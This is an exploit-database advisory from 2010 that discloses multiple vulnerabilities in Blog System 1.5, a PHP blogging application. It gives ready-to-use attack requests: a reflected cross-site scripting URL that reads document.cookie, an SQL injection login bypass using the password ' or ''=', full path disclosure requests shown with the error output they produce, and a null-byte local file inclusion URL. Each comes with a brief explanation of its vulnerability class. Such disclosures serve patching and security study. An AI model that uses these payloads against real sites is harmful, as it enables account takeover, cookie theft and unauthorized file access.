Blog System 1.5 - Multiple Vulnerabilities

EDB-ID:

12192

CVE:

N/A

Author:

cp77fk4r

Type:

webapps

Platform:

PHP

Published:

2010-04-13

# Exploit Title: Blog System <= 1.5 Multiple Vulnerabilities
# Date: 04/04/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il>
# Software Link: http://www.netartmedia.net/blogsystem/ | http://www.netartmedia.net/blogsystem/demo.html
# Version: <= 1.5
# Tested on: PHP
#
##[Cross Site Scripting]*
(Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it)
http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
#
#
##[SQL Injection]
(A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.)
#
http://[SERVER]/index.php
#
i.e.:
#
User: admin
Pass: ' or ''='
#
#
##[FULL PATH DICSLOSURE]**
(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP))
#
The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory") with includes their Full-Path:
#
http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=cP
#
Will returne:
#
Warning: include(home/cP.php) [function.include]: failed to open stream: No such file or directory in [FPD] on line 332
Warning: include(home/cP.php) [function.include]: failed to open stream: No such file or directory in [FPD] on line 332
Warning: include() [function.include]: Failed opening 'home/pa.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in [FPD] on line 332
#
#
http://[SERVER]/blog.php?user=admin&month2=4&year2=aaaaaaaaaaaaa
#
Will Returne:
#
Warning: mktime() expects parameter 6 to be long, string given in [FPD] on line 179
Warning: mktime() expects parameter 6 to be long, string given in [FPD] on line 180
#
#
##[LOCAL FILE INCLUSION]**
http://[SERVER]/ADMIN/index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00
#
#
*The victim must be logged in.
**The attacker must be logged in.
#
#
[e0f]